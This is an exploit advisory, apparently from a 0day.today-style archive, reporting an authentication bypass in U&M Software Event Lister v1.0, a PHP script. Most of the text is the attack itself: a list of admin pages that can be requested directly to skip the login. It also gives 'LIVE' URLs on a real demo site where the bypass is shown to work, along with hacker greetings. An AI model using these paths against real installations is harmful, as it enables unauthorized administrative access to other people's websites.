U&M Software Event Lister 1.0 Auth Bypass Vulnerabilit
U&M Software Event Lister 1.0 Auth Bypass Vulnerability
U&M Software Event Lister v1.0 Auth Bypass Vulnerability
[»] Script: [ U&M Software Event Lister v1.0 ]
[»] Language: [ PHP ]
[»] Website: [ http://www.hotscripts.com/Detailed/84735.html ]
[»] Type: [ Commercial ]
[»] Report-Date: [ 06.11.2008 ]
[»] Founder: [ G4N0K ]
===[ XPL ]===
[!] Use one of these paths to bypass admin login ;)
[»] http://localhost/[path]/admin/start.php
[»] http://localhost/[path]/admin/aktivitet.php
[»] http://localhost/[path]/admin/prop_aktivitet.php
[»] http://localhost/[path]/admin/kategorier.php
[»] http://localhost/[path]/admin/konfig.php
[»] http://localhost/[path]/admin/security.php
[»] http://localhost/[path]/admin/manual.php
===[ LIVE ]===
[»] http://www.justlistit.uochm.com/demo/admin/start.php
[»] http://www.justlistit.uochm.com/demo/admin/index.php
===[ Greetz ]===
[»] Tornado2800
[»] Hussain-X
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
exit(); //EoX
# 0day.today [2018-01-04] #
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